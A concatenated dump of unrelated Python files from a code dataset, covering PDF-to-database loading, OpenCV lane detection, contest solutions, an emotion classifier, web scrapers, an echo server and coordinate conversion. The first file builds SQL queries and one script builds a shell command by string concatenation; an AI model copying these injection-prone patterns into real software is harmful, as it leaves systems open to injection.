def processaPDF():
# Lê PDF com hitorico de colheita
tabelaComum = read_pdf('colheita18_19.pdf')
# Tranforma os dados gerados do PDF em um DataFrame
dfSoja = pd.DataFrame(tabelaComum[0])
# apaga as linhas com sujeira
dfSoja = dfSoja.dropna()
# Retira Caracter % e troca virgula por ponto
for coluna in dfSoja.columns:
dfSoja[coluna] = dfSoja[coluna].apply(lambda x : str(x).replace("%", ""))
dfSoja[coluna] = dfSoja[coluna].apply(lambda x : str(x).replace(",", "."))
# separa colunas que vieram unidas
new = dfSoja["Norte Oeste"].str.split(" ", n = 1, expand = True)
dfSoja['Norte'] = new[0]
dfSoja['Oeste'] = new[1]
dfSoja.pop('Norte Oeste')
# Apaga as 2 ultimalinhas geradas para limpar o dataframe
dfSoja = dfSoja.apply(lambda x: x.head(-2)).reset_index(0, drop=True)
dfSoja = dfSoja.iloc[1:]
dfSoja['Regiões do IMEA'] = dfSoja['Regiões do IMEA'].apply(ajustaData)
# Retira coluna gerada com sujeira
dfSoja['Norte'] = dfSoja['Norte'].map(limpaValores)
# Unpivota dados
df_unpivoted = dfSoja.melt(id_vars=['Regiões do IMEA', ], var_name='regioesIMEA', value_name='percentual')
df_unpivoted.columns = ['data', 'regioesIMEA', 'percentual']
#insere dados novos na base
sql = "insert into soja.producaoSoja(\
datacotacao, \
regioesimea, \
percentual\
) values"
conectaInsert = ''
executa = False
for index, row in df_unpivoted.iterrows():
bd.cur.execute("select datacotacao\
from soja.producaosoja \
where datacotacao = '" + row['data'] + "' \
and regioesimea = '" + row['regioesIMEA'] + "'")
recset = bd.cur.fetchall()
if len(recset) <= 0:
sql = sql + conectaInsert + "(\
'" + row['data'] +"',\
'" + row['regioesIMEA'] +"',\
" + row['percentual'] +"\
)"
executa = True
conectaInsert = ', '
if executa:
bd.cur.execute(sql)
bd.con.commit()
bd.con.close()
print(df_unpivoted)
processaPDF()
| true |
3f0dce30a3a36a55fecd21764b79f3ddc60a9701 | Python | Artemy2807/line-detect-py | /road.py | UTF-8 | 19,188 | 2.921875 | 3 | [] | no_license | import cv2 as cv
import numpy as np
import time
vid = cv.VideoCapture("roadgazebo.avi")
if vid.isOpened() == False:
print("Cannot open input video")
exit()
imgRoadMin = [210, 320] #размеры сжатого в последующем изображении, с которым будем работать (высота 240 px, ширина 320px, то есть вдвое меньше оригинала
roi = np.float32([[10, 200], #массив точек области интереса дорожной разметки x, y начиная отсчет с левого верхнего угла (float32 т.е. элементы массива с плавающей точкой с точностью до 8 знака после запятой 1.0000001) и по часовой стрелки по - порядку
[300, 200], #тип float32 для трансформации скорее всего???
[230, 140],
[85, 140]])
# [20, 200], левая нижняя точка
# [310, 200], правая нижняя точка
# [225, 120], правая верхняя точка
# [100, 120]] левая верхняя точка
roi_draw = np.array(roi, dtype=np.int32) #копируем массив с областью интереса для рисования с преобразованием данных к целочисленному int32. Целые числа в диапазоне от -2147483648 по 2147483647, (числа размером 4 байта).
#первый аргумент это массив, который копируем, второй - тип данных
dst = np.float32([[0, imgRoadMin[0]], #массив координат области начиная с левого нижнего угла по часовой стрелке откладывая от вернхнего левого, куда поместим область интереса, это по сути углы исходного ужатого изображения
[imgRoadMin[1], imgRoadMin[0]],
[imgRoadMin[1], 0],
[0, 0]])
key = 0
while (cv.waitKey(40) != 27): #если нужно переключение кадров сделать по клавише, в скобках cv.waitKey() пусто, а 40 это 40 мс между кадрами то есть фпс 25
# // waitKey
# возвращает - 1, если ничего не нажать
# // если нажали клавишу, эта функция возвращает код ключа ASCII
# // if (waitKey() == 27) в таком случае будем ждать нажатия клавыши esc (код 27) для выхода
# // и если оставим пустым аргумент waitKey, то кадр будет обновляться с нажатием любой клавиши
# // Число 40 получается по нехитрой формуле:
# // 1000 миллисекунд / 25 кадров в секунду = 40 миллисекунд
# // чаще обращаться смысла нет, если камера не поддерживает большее fps
ret, frame = vid.read()
if ret == False:
print("End of video")
#cap.release()
#cap = cv.VideoCapture(r"test_videos/output1280.avi")
#ret, frame = cap.read()
#break
resized = cv.resize(frame, (imgRoadMin[1], imgRoadMin[0])) #уменьшаем исходный кадр до заданых размеров для более быстрой работы обработки изображения (в частности бинаризации)
cv.imshow("frame", resized)
r_channel = resized[:, :, 2]
binary = np.zeros_like(r_channel)
binary[(r_channel > 200)] = 1
#cv.imshow("r_channel",binary)
#альтернативная бинаризация по красной компоненте
# hls=cv.cvtColor(resized, cv.COLOR_BGR2HLS)
# s_channel = resized[:, :, 2]
# binary2 = np.zeros_like(s_channel)
# binary2[(r_channel > 160)] = 1
#
# allBinary = np.zeros_like(binary)
# allBinary[((binary == 1)|(binary2 == 1))] = 255
#более короткая бинаризация изображения через treshold с предварительным переводом изображения в одноканальное
resized = cv.cvtColor(resized, cv.COLOR_RGB2GRAY)
ret, allBinary = cv.threshold(resized, 150, 255, cv.THRESH_BINARY) #для игнорирования флага наличия изображения (_, allBinary)
#print(allBinary.shape[-1]) #вывод каналов изображения
#cv.imshow("binary", allBinary)
allBinary_visual = allBinary.copy() #предварительно копируем из основного изображения в новое, чтобы не испортить исходное
cv.polylines(allBinary_visual, [roi_draw], True, 255) #соеднияем точки массива [roi_draw] одной линией белой линией для одноканального изображения 255
cv.imshow("roi", allBinary_visual)
#расчет матрицы преобразований, где первый аргумент это массив с координатами области интрерса, то есть наша трапеция
#а второй аргумент как раз координаты углов ужатого изображения
M = cv.getPerspectiveTransform(roi, dst) #на выходе матрица M для получения прямоугольного изображения
#https://youtu.be/ApUQ0EgrnM0
#https://learnopencv.com/feature-based-image-alignment-using-opencv-c-python/
#https://www.geeksforgeeks.org/perspective-transformation-python-opencv/
# allBinary - изображение, которое хотим преобразовать, M - матрица преобразования, далее размер изображения (как и входное),
#flags=cv.INTER_LINEAR - способ расчета
# imgIntpl преобразование изображение из трапецевидного в обычное квадратное
imgIntpl = cv.warpPerspective(allBinary, M, (imgRoadMin[1], imgRoadMin[0]), flags=cv.INTER_LINEAR)
#cv.imshow("imgIntpl", imgIntpl)
#поиск самых белых столбцов на преобразованном из трапеции в прямоугольник изображении
#укороченный вариант для суммирования, где axis=0 это вертикаль и в histogram мы получим сумму белых элементов в каждом столбце
#суммирование пикселей происходит от низа картинки до середины imgIntpl.shape[0]//2
histogram = np.sum(imgIntpl[imgIntpl.shape[0] // 2:, :], axis=0)
#поиск начинается с середины по вертикали и смотрим слева и справа
midpoint = histogram.shape[0]//2 #номер центрального столбца, берем целое число обазательно, поэтому //, а не /
idLeft = np.argmax(histogram[:midpoint])
idRight = np.argmax(histogram[midpoint:]) + midpoint
#альтернатиным более долгим вариантом: просуммируем все белые пиксели в каждом стобце через for
#shape[0] - строка картинки shape[1] столбец картинки
#находим номер пикселя по X самого белого столбца в левой части области интереса и в правой области интереса
# indexMas = 0
# whitePix = 0
# idLeft = 0
# idRight = 0
# maxWhitePix = 0
# arrayWhitePixel = []
# for i in range(0, imgIntpl.shape[1]): # по правой части кадра
# indexMas = indexMas + 1
# whitePix = 0
# if (i == imgIntpl.shape[1] // 2):
# maxWhitePix = 0
# for j in range(imgIntpl.shape[0] // 2, imgIntpl.shape[0]):
# if (imgIntpl[j, i] > 100):
# whitePix = whitePix + 1
# if (whitePix > maxWhitePix):
# if (i < imgIntpl.shape[1] // 2): # левая часть
# idLeft = i
# else:
# idRight = i
# maxWhitePix = whitePix
imgIntpl_visual = imgIntpl.copy() #рисовть серые линии будем на копии изображении для демонстрации чтобы не испортить оригинал
cv.line(imgIntpl_visual, (idLeft, imgIntpl_visual.shape[0]//2), (idLeft, imgIntpl_visual.shape[0]), 122, 3)
cv.line(imgIntpl_visual, (idRight, imgIntpl_visual.shape[0]//2), (idRight, imgIntpl_visual.shape[0]), 122, 3)
cv.imshow("imgIntpl_visual", imgIntpl_visual)
wind = 7 #количество окон для поиска белой линии
windH = np.int(imgIntpl.shape[0]/wind) #высота окна с учетом их количества и высоты исходного изображения (чтобы сверху до низу были окна)
windSearchWidth = 25 #ширина окна в пикселях
xCentrLeftWind = idLeft #центр первого белого окна как раз совпадает с номером столбца
xCenRightWind = idRight
leftLinePixIndex = np.array([], dtype = np.int16) #создаем пока пустой массив центров линии с типом данных int16, т.к. функции работают с этим типом
rightLinePixIndex = np.array([], dtype = np.int16) #справа по аналогии
# преобразование изображеня в трехканальное (оно всеравно будет ЧБ) но тогда можно будет рисовать цветные окна и линии на этом изображении
#outImg = np.dstack((imgIntpl, imgIntpl, imgIntpl))
# получаем номера (то есть индексы) всех белых пикселей на изоборажении
nonZero = imgIntpl.nonzero() #imgIntpl-изображение, то есть по факту массив, к которому применяем функцию, возвращающая список номеров всех ненулевых элементов массива imgIntpl
#nonZero-в этому списке хранятся индексы по строкам и по столбцам всех ненулевых элементов массива
whitePixY = np.array(nonZero[0]) #выделяем индексы строк белых пикселей уже в массив, а не в список
whitePixX = np.array(nonZero[1]) #выделяем индексы столбцов белых пикселей уже в массив, а не в список
sumX = 0
for i in range(wind): #создаем окна для поиска центра линии в каждом окне
#на каждом проходе for появляется по два окна снизу вверх (дебагом точки можно поставить на функции ректангл)
#координаты углов окон (y координата для левго и правого она одинаковая, а x - меняется)
windY1 = imgIntpl.shape[0] - (i + 1) * windH #верхняя координата от нижнего края изображения вычитаем (номер окна + 1)*на высоту окна
windY2 = imgIntpl.shape[0] - (i) * windH #нижняя координата также только без 1 как раз на одну высоту окна меньше
leftWindX1 = xCentrLeftWind - windSearchWidth #меньшая координта: от центра окна отнимается половина ширины
leftWindX2 = xCentrLeftWind + windSearchWidth #большая координта: к центру окна прибавляется половина ширины
rightWindX1 = xCenRightWind - windSearchWidth
rightWindX2 = xCenRightWind + windSearchWidth
#отрисовываем окна поиска белой линии
cv.rectangle(imgIntpl, (leftWindX1, windY1), (leftWindX2, windY2), 122, 1) # поставить outImg если хотим нарисовать цветные окна поиска cv.rectangle(outImg, (leftWindX1, windY1), (leftWindX2, windY2), (0, 255, 0), 1)
cv.rectangle(imgIntpl, (rightWindX1, windY1), (rightWindX2, windY2), 122, 1)
#cv.imshow("searchWind", imgIntpl) #вернуть outImg если преобразуем в трехканальное для цветной отрисовки окон поиска
#ищем пиксели в каждом окне, принадлежащие разметке
#если координата текущего белого пикселя попдает внутрь диапазона по X и Y
#текущего скользящего окна (сначала левого, потом правого) то сохраним координаты пикселей в массив leftPixInWind
#вконце обязательно указать [0], если этот нулевой индекс не укажем, будет вместо массива кортеж
leftPixInWind = ((whitePixY >= windY1) & (whitePixY <= windY2) & (whitePixX >= leftWindX1) & (whitePixX <= leftWindX2)).nonzero()[0]
rightPixInWind = ((whitePixY >= windY1) & (whitePixY <= windY2) & (whitePixX >= rightWindX1) & (whitePixX <= rightWindX2)).nonzero()[0]
# *** поставить точку дебага и вывести массив номеров (то есть индексов) белых пикселей в окне
#print(leftPixInWind)
leftLinePixIndex = np.concatenate((leftLinePixIndex, leftPixInWind)) #на каждой новой этерации пополняем массив индексов - склейка(как инкрементирование)
rightLinePixIndex = np.concatenate((rightLinePixIndex, rightPixInWind))
#находим среднее значение белой линии чтобы расположить сооответсвенно окно, которое наглядно следит за линией
#смещаем окно, если попало пикселей больше 40
#и если в окно не попадает разметки или попадает меньше 40 то окно не смещается и
#они получаются столбиками. Отчетливо это видно при прорисовки на пунктирной части разметки
if len(leftPixInWind) > 40:
#функция np.mean возвращает значение типа float, чтобы получить значения типа инт, преобразуем: np.int
xCentrLeftWind = np.int(np.mean(whitePixX[leftPixInWind])) #индексы индексов пикселей. напомню, координаты пикселей, попавших в окно хранятся в whitePixX
#***поставить точку для дебага и вывести показания расчитанного центра линии для очередного окна на основе элементов, попавших в окно
#print(xCentrLeftWind) #индексы leftPixInWind, попавшие в мелькое следаящее окошко??
if len(rightPixInWind) > 40:
xCenRightWind = np.int(np.mean(whitePixX[rightPixInWind]))
#print(xCenRightWind)
#ПЕРВЫЙ СПОСОБ НАХОЖДЕНИЯ ЦЕНТРА ДОРОГИ (#рисуем центральну линию относительно найденных центров в каждом скользяцем окне)
x = int((xCenRightWind+xCentrLeftWind)/2) #находим центр дороги по каждому данным середины линии каждого окна поиска
#print(x)
cv.circle(imgIntpl, (x, windY1), 3, 122, -1) # 3-радиус, далее цвет и толщина линии (-1 залить круг)
sumX = sumX + x
# далее можно сложить все показания в массив и устреднить это значение. Тогда в текущем центре будет отражаться не только то что за копотом авто, а как и дальше трасса себя ведет
cv.circle(imgIntpl, (int(sumX/wind), 100), 5, 122, -1)
#перекрас пикселей, оказавшихся внутри скользящих окон (сначала нужно указать строки, затем столбцы)
# outImg[whitePixY[leftLinePixIndex], whitePixX[leftLinePixIndex]] = [0, 255, 0]
# outImg[whitePixY[rightLinePixIndex], whitePixX[rightLinePixIndex]] = [0, 0, 255]
#cv.imshow("Lane", outImg)
#ВТОРОЙ СПОСОБ ПОИСКА ЦЕНТР ДОРОГИ (рисуем параболу окружностью)
# leftx = whitePixX[leftLinePixIndex]
# lefty = whitePixY[leftLinePixIndex]
# rightx = whitePixX[rightLinePixIndex]
# righty = whitePixY[rightLinePixIndex]
#
# left_fit = np.polyfit(lefty, leftx, 2)
# right_fit = np.polyfit(righty, rightx, 2)
# # центр линии лежит между левой и правой линией разметки
# center_fit = ((left_fit+right_fit)/2)
#
# for ver_ind in range(outImg.shape[0]):
# gor_ind = ((center_fit[0]) * (ver_ind ** 2) +
# center_fit[1] * ver_ind +
# center_fit[2])
# cv.circle(outImg, (int(gor_ind), int(ver_ind)), 2, (255, 0, 0), 1)
cv.imshow("CenterLine", imgIntpl) # вернуть outImg, если пребразуем к трехканальному для рисования цветных квадратов
| true |
fff17af49f7c3336e75277b6bec8b665776b8acf | Python | Aasthaengg/IBMdataset | /Python_codes/p02955/s529095346.py | UTF-8 | 1,193 | 2.84375 | 3 | [] | no_license | N, K = map(int, input().split())
A = list(map(int, input().split()))
def divisor(N):
from math import sqrt
D = []
for i in range(1, int(sqrt(N)) + 1):
if N % i == 0:
D.append(i)
D.append(N // i)
return list(set(D))
s = sum(A)
divisors = divisor(s)
divisors.sort(reverse=True)
pride = 0
tention = 0
TKM = []
for d in divisors:
for i, a in enumerate(A):
l = -(a % d)
h = d - (a % d)
TKM.append((h, l))
hekinan = sorted(TKM, key=lambda shisho: abs(shisho[0]))
if abs(hekinan[0][0]) <= abs(hekinan[-1][1]):
pride += abs(hekinan[0][0])
tention += hekinan[0][0]
hekinan = hekinan[1:]
else:
pride += abs(hekinan[-1][1])
tention += hekinan[-1][1]
hekinan = hekinan[:-1]
while len(hekinan) != 0:
if tention >= 0:
pride += abs(hekinan[-1][1])
tention += hekinan[-1][1]
hekinan = hekinan[:-1]
else:
pride += abs(hekinan[0][0])
tention += hekinan[0][0]
hekinan = hekinan[1:]
if pride // 2 <= K:
print(d)
break
pride = 0
tention = 0
TKM = []
| true |
0f5bf9d436cddfae4fe84d22ffc31e111693e0a6 | Python | Neeraj-kaushik/Geeksforgeeks | /Recursion/N-queen.py | UTF-8 | 809 | 3.203125 | 3 | [] | no_license | def queensafe(li, row, col):
i = row-1
j = col
while i >= 0:
if li[i][j] == 1:
return False
i -= 1
k = row-1
l = col-1
while k >= 0 and l >= 0:
if li[k][l] == 1:
return False
k -= 1
l -= 1
m = row-1
n = col+1
while m >= 0 and n < len(li):
if li[m][n] == 1:
return False
m -= 1
n += 1
return True
def queen(li, ans, row):
for col in range(len(li)):
if row == len(li):
print(ans)
return
if queensafe(li, row, col) == True:
li[row][col] = 1
queen(li, ans+str(row)+"-"+str(col)+",", row+1)
li[row][col] = 0
n = int(input())
li = [[0 for j in range(n)] for i in range(n)]
queen(li, "", 0)
| true |
37a7407568b61b13c4242eb8663f02b3f07addc7 | Python | gianbatayola/FIR-2 | /FIR.py | UTF-8 | 2,338 | 3.1875 | 3 | [] | no_license | # Gian Batayola
# Goal: Rank the importance of features for classification performance to determine which features
# are most impactful
# Two Potential Goals:
# 1. Understanding which features are most impactful for a fixed model
# 2. Selecting features for training a new model
# Steps:
# 1. Make some pseudo data with clear good and bad features
# 2. Train a model with combined good+bad data
# 3. Rank features with amazing method
# 3.1 Permutation based
# 3.2 Gradient based?
# 3.3 Perhaps with correlation stuff
# 4. Determine if ranking matches my expectations
from sklearn.datasets import load_breast_cancer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from FIR_model import Model
from FIR_functions import add_noise
from itertools import combinations
import numpy as np
# extract the data
dataset = load_breast_cancer()
features = dataset['feature_names']
# 10 features might make more sense, 11-30 are error and worst values won't really work with noise
features = features[:10]
X = dataset['data']
X = np.delete(X, slice(10, 30, 1), 1)
# print(X[0])
# https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.MinMaxScaler.html
scale = StandardScaler()
scale.fit(X)
X = scale.transform(X)
# print(X[0])
y = dataset['target']
# scale = MinMaxScaler(feature_range=(0, 1))
# scale.fit(X)
# X = scale.transform(X)
# print(X[0])
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=1 / 3, random_state=0)
n_test_samples = len(X_test)
# set up
ncr_acc = []
ncr_feats = []
perm = combinations([0, 1, 2, 3, 4, 5, 6, 7, 8, 9], 5)
perm = list(perm)
# use the model
for i in range(len(perm)):
model = Model(10, 15, 12, n_test_samples)
# model.evaluate(X_train, y_train, X_test, y_test)
# model.rank(X_train, y_train, features)
# add noise
X_test = add_noise(X_test, features, 5, 0, random_state=None, noisy_indices=perm[i])
acc = model.evaluate(X_train, y_train, X_test, y_test)
feats = model.rank(X_test, y_test, features, 5)
ncr_acc.append(acc)
ncr_feats.append(feats)
best_acc = max(ncr_acc)
best_acc_index = ncr_acc.index(best_acc)
print('Best accuracy was', best_acc)
print('Features were', ncr_feats[best_acc_index])
| true |
a9f067b5267d8faae02ea11cae348fc33d2aac0a | Python | demagleb/fast-typing | /dictionaries.py | UTF-8 | 2,837 | 3.03125 | 3 | [
"MIT"
] | permissive | import time
from tkinter import Label
from bs4 import BeautifulSoup
import requests
from PIL import ImageFont
from tkinter.filedialog import askopenfile
def format_text(text: str):
font = ImageFont.truetype("fonts/helvetica.ttf", 14, encoding="unic")
MAXLEN = 700
text = text.replace('—', '-').replace('«', '"').replace('»', '"')
text = text.splitlines(0)
res = [[]]
lastlen = len(res[0])
for line in text:
line = line.split()
for word in line:
sz = font.getsize(" " + word)[0]
if lastlen == 0 or lastlen + sz < MAXLEN:
res[-1].append(" " + word)
lastlen += sz
else:
res.append([word])
lastlen = sz - font.getsize(" ")[0]
res.append([])
lastlen = 0
res = ["".join(i).strip() for i in res]
return "\n".join(filter(lambda i: i, res))
class FileDictionary:
def __init__(self) -> None:
with askopenfile(mode="r", filetypes=[("Text file", "*.txt")]) as file:
if file != None:
self.text = file.read(5000)
else:
self.text = ""
def get_data(self):
return format_text(self.text)
class RandomTextEnglishDictionary:
def __init__(self) -> None:
resp = requests.get("https://randomtextgenerator.com/")
soup = BeautifulSoup(resp.text, "lxml")
self.text = soup.find(id="randomtext_box").text
def get_data(self):
return format_text(self.text)
class RandomTextRussianDictionary:
def __init__(self) -> None:
self.text = ''
for _ in range(3):
session = requests.session()
site = session.get('https://nocover.ru/')
site_soup = BeautifulSoup(site.text, 'lxml')
getbook_method = site_soup.find('div', id='footer').find(
'a', class_="dlink").get('onclick')
bookid, passageid = (i.strip()
for i in getbook_method[9:-1].split(','))
name_page = session.post('https://nocover.ru/getname/',
data={
'bookid': bookid,
'passageid': passageid
})
name_soup = BeautifulSoup(name_page.text, 'lxml')
book = name_soup.find('div').text
self.text += book + '\n'
for i in site_soup.find('div', class_='text').find_all('p'):
self.text += i.text + '\n'
def get_data(self):
return format_text(self.text)
DICTIONARIES = {
"Random Text (english)": RandomTextEnglishDictionary,
"Случайный текст (русский)": RandomTextRussianDictionary,
"Text from file": FileDictionary
}
| true |
64550529eafbca2e194825fcfcaeee42bb91b6e0 | Python | dehasi/practical-minimum-2020-labs | /lab6/echo_server.py | UTF-8 | 329 | 2.59375 | 3 | [] | no_license |
import socket
HOST = '127.0.0.1'
PORT = 8080
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.bind((HOST, PORT))
socket.listen()
conn, addr = socket.accept()
print('Connected by', addr)
while True:
data = conn.recv(1024)
if not data:
break
conn.sendall(data)
conn.close()
socket.close()
| true |
265340d3e2778e1b0ed880c28c7f669ee1159460 | Python | adrija24/languages_learning | /Python/Day 3/To print list of values from dictionary.py | UTF-8 | 93 | 2.96875 | 3 | [] | no_license | """To print list of values from dictionary"""
a={'pp':21, 'qq':23, 'rr':20}
print(a.values()) | true |
d14a05f6c45bab5de90950e3cd5241ab00df4ffa | Python | vlazic/webfactionddns | /webfactionddns/webfactionddns.py | UTF-8 | 1,384 | 2.921875 | 3 | [
"MIT"
] | permissive | """Main module."""
import xmlrpc.client
import requests
import os
class WebfactionDDNS:
__my_ip_url = 'http://ip.fs.rs'
__webfaction_api_url = 'https://api.webfaction.com/'
def __init__(self, username, password):
self.__server = xmlrpc.client.ServerProxy(self.__webfaction_api_url)
self.__session_id = self.__server.login(username, password)[0]
def change_my_ip_provider(self, my_ip_url):
self.__my_ip_url = my_ip_url
def update_dns(self, domain_to_check, new_ip=False):
domains = self.__server.list_dns_overrides(self.__session_id)
if not new_ip:
new_ip = requests.get(self.__my_ip_url).text
for domain_info in domains:
domain = domain_info['domain']
if domain == domain_to_check:
old_ip = domain_info['a_ip']
if old_ip == new_ip:
print("IP's are the same")
return
else:
return self.change_domain_ip(domain_to_check, old_ip, new_ip)
print("This domain is not created. You need to create it first")
def change_domain_ip(self, domain, old_ip, current_ip):
self.__server.delete_dns_override(self.__session_id, domain, '')
self.__server.create_dns_override(
self.__session_id, domain, current_ip)
return current_ip
| true |
1b664084f1928ac0af631c0c2a109c5d9e563e01 | Python | shmilyvidian/Python001-class01 | /week03/course_code/p3_thread.py | UTF-8 | 526 | 3.296875 | 3 | [] | no_license | import threading
class MyThread(threading.Thread):
def __init__(self, num):
super().__init__()
self.num = num
def run(self):
print(f'name {self.name}')
def f(name):
print(f'name {name}')
if __name__ == "__main__":
# t1 = threading.Thread(target=f, args=('t1',))
# t2 = threading.Thread(target=f, args=('t2',))
# t1.start()
# t2.start()
# t1.join()
# t2.join()
t1 = MyThread('t1')
t2 = MyThread('t2')
t1.start()
t2.start()
print('main')
| true |
597d34f27499e6fbb60a51a3a3a9164c02a12da3 | Python | damianchybki/fake-news-ml | /helpers/splitter.py | UTF-8 | 331 | 2.90625 | 3 | [] | no_license | from sklearn.model_selection import train_test_split
class TrainTestSplitter:
def __init__(self, train_column, test_column):
self.train_column = train_column
self.test_column = test_column
def split(self):
return train_test_split(self.train_column, self.test_column, test_size=0.2, random_state=7) | true |
95e20656b9294630351c6931aae0e8d83fc64c74 | Python | brewswain/PCC | /Part I - Basics/Chapter 05 - Dictionaries/Problems/6-8.py | UTF-8 | 638 | 3.46875 | 3 | [] | no_license | # bob = {'species': 'manatee', 'owner': 'big bob'}
# sully = {'species': 'sloth', 'owner': 'patches'}
# darius = {'species': 'kangaroo', 'owner': 'jack'}
pets = []
pet = {
'name': 'bob',
'species': 'manatee',
'owner': 'big bob',
}
pets.append(pet)
pet = {
'name': 'sully',
'species': 'sloth',
'owner': 'patches',
}
pets.append(pet)
pet = {
'name': 'darius',
'species': 'kangaroo',
'owner': 'jack',
}
pets.append(pet)
for pet in pets:
print("\nThis is " + pet['name'].title() + "'s information:")
for key, value in pet.items():
print("\t\t" + key.title() + ': ' + value.title())
| true |
15dfbc83cd9fba817b6acf9dc95f99249976fb03 | Python | onikazu/ProgramingCompetitionPractice | /Atcoder/abc156/d.py | UTF-8 | 942 | 3.5625 | 4 | [] | no_license | q, a, b = map(int, input().split())
n = 10 ** 9
k = 2 * 10 ** 5
mod = 10**9 + 7
# x ** a をmodで割った余りを、O(log(a))時間で求める。
def power(x, a):
if a == 0:
return 1
elif a == 1:
return x
elif a % 2 == 0:
return power(x, a//2) **2 % mod
else:
return power(x, a//2) **2 * x % mod
# xの逆元を求める。フェルマーの小定理より、 x の逆元は x ^ (mod - 2) に等しい。計算時間はO(log(mod))程度。
# https://qiita.com/Yaruki00/items/fd1fc269ff7fe40d09a6
def modinv(x):
return power(x, mod-2)
def binomial_coefficients(n, k):
numera = 1 # 分子
denomi = 1 # 分母
for i in range(k):
numera *= n-i
numera %= mod
denomi *= i+1
denomi %= mod
return numera * modinv(denomi) % mod
print(((((power(2, q) - binomial_coefficients(q, a)) % mod) - binomial_coefficients(q, b)) % mod - 1) % mod)
| true |
a106cda05535c33fb67eed730454f2d63a69c23b | Python | voidism/HsinChu | /emerg/fireDep.py | UTF-8 | 1,782 | 2.9375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
import os, csv, json, codecs, re
def WGS84FromTWD67TM2(x ,y):
out = {'status' :False}
lat = None
lon = None
# TWD67 to TWD97
A = 0.00001549
B = 0.000006521
x = float(x)
y = float(y)
x = x + 807.8 + A * x + B * y
y = y - 248.6 + A * y + B * x
# TWD97 to WGS84
result = os.popen( 'echo ' +str(x ) + ' ' +str
(y ) +' | proj -I +proj=tmerc +ellps=GRS80 +lon_0=121 +x_0=250000 +k=0.9999 -f "%.8f"').read().strip() # lat, lng 格式, 不必再轉換
process = re.compile( '([0-9]+\.[0-9]+)', re.DOTALL )
for item in process.findall(result):
if lon == None:
lon = float(item)
elif lat == None:
lat = float(item)
else:
break
# result = os.popen('echo '+str(x)+' '+str(y)+' | proj -I +proj=tmerc +ellps=GRS80 +lon_0=121 +x_0=250000 +k=0.9999').read().strip() # 分度秒格式
# 分度秒格式轉換
# process = re.compile( "([0-9]+)d([0-9]+)'([0-9\.]+)\"E\t([0-9]+)d([0-9]+)'([0-9\.]+)", re.DOTALL )
# for item in process.findall(result):
# lon = float(item[0]) + ( float(item[1]) + float(item[2])/60 )/60
# lat = float(item[3]) + ( float(item[4]) + float(item[5])/60 )/60
# break
if lat == None or lon == None:
return out
out['lat'] = lat
out['lng'] = lon
out['status'] = True
return out
file = codecs.open('fireDep.json', 'r', 'utf-8-sig')
data = json.loads(file.read())
for i in data:
gps = WGS84FromTWD67TM2(i["GPS TWD67 X座標"],i["GPS TWD67 Y座標"])
if gps['status']:
i['lat']=str(gps['lat'])
i['lng']=str(gps['lng'])
else:
print("fail!")
with open('fireDep2.json', 'w') as file1:
json.dump(data, file1)
file1.close() | true |
5d452164521e36be8fa8ce4f84aa9feab9a08552 | Python | GassaFM/contests | /facebook/fbhc2018-r1/dgen.py | UTF-8 | 489 | 2.609375 | 3 | [] | no_license | import random
random.seed (26932486)
t = 75
print t
for i in range (t):
n = 3000
a = [random.randrange (1, 1000000) for i in range (n - 1)]
b = [random.randrange (1, 1000000) for i in range (n - 1)]
for k in range (n - 1):
a[k], b[k] = min (a[k], b[k]), max (a[k], b[k])
m = 3000
y = list (range (1, n + 1))
random.shuffle (y)
h = [random.randrange (1, 1000000) for i in range (n)]
print n, m
for k in range (n - 1):
print a[k], b[k]
for j in range (m):
print y[j], h[j]
| true |
bb52d847c5c51c22e7a80170291e39ba17e43595 | Python | daniel-reich/ubiquitous-fiesta | /i5kcGmT7gFKkf3mTi_8.py | UTF-8 | 289 | 2.984375 | 3 | [] | no_license |
def data_type(value):
if type(value) == list:
return 'list'
elif type(value) == dict:
return 'dictionary'
elif type(value) == str:
return 'string'
elif type(value) == int:
return 'integer'
elif type(value) == float:
return 'float'
else:
return 'date'
| true |
651ab449eb5b443f5e060db4a5974c50f44071c8 | Python | eeshan9815/EmotionRecogniton | /VisCom/real-time_emotion_analyzer/still-image.py | UTF-8 | 2,491 | 2.84375 | 3 | [] | no_license | import cv2
import sys
import json
import time
import numpy as np
from keras.models import model_from_json
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
def predict_emotion(face_image_gray, model): # a single cropped face
resized_img = cv2.resize(face_image_gray, (48,48), interpolation = cv2.INTER_AREA)
# cv2.imwrite(str(index)+'.png', resized_img)
image = resized_img.reshape(1, 1, 48, 48)
list_of_list = model.predict(image, batch_size=1, verbose=1)
angry, fear, happy, sad, surprise, neutral = [prob for lst in list_of_list for prob in lst]
return [angry, fear, happy, sad, surprise, neutral]
def still_image(path):
emotion_labels = ['angry', 'fear', 'happy', 'sad', 'surprise', 'neutral']
cascPath = 'haarcascade_frontalface_default.xml'
faceCascade = cv2.CascadeClassifier(cascPath)
# load json and create model arch
json_file = open('model.json','r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
# load weights into new model
model.load_weights('model.h5')
# Capture frame-by-frame
frame = cv2.imread(path)
cv2.imshow('Image1',frame)
img_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY,1)
faces = faceCascade.detectMultiScale(
img_gray,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30),
flags=cv2.cv.CV_HAAR_SCALE_IMAGE
)
emotions = []
# Draw a rectangle around the faces
for (x, y, w, h) in faces:
# fig, ax = plt.subplots()
face_image_gray = img_gray[y:y+h, x:x+w]
cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
plt.imshow(frame)
plt.show()
angry, fear, happy, sad, surprise, neutral = predict_emotion(face_image_gray, model)
with open('emotion.txt', 'a') as f:
f.write('{},{},{},{},{},{},{}\n'.format(time.time(), angry, fear, happy, sad, surprise, neutral))
# ('{},{},{},{},{},{},{}\n'.format(time.time(), angry, fear, happy, sad, surprise, neutral))
s = 'angry {}, fear {}, happy {}, sad {}, surprise {}, neutral {}\n'.format(angry, fear, happy, sad, surprise, neutral)
a = plt.bar(emotion_labels, [angry, fear, happy, sad, surprise, neutral],align = 'center',color = ['r','#800080','y','b','#ffa500','#9acd32'])
plt.show()
# Display the resulting frame
cv2.imshow('Image', frame)
if __name__ == '__main__':
still_image('sample.jpg') | true |
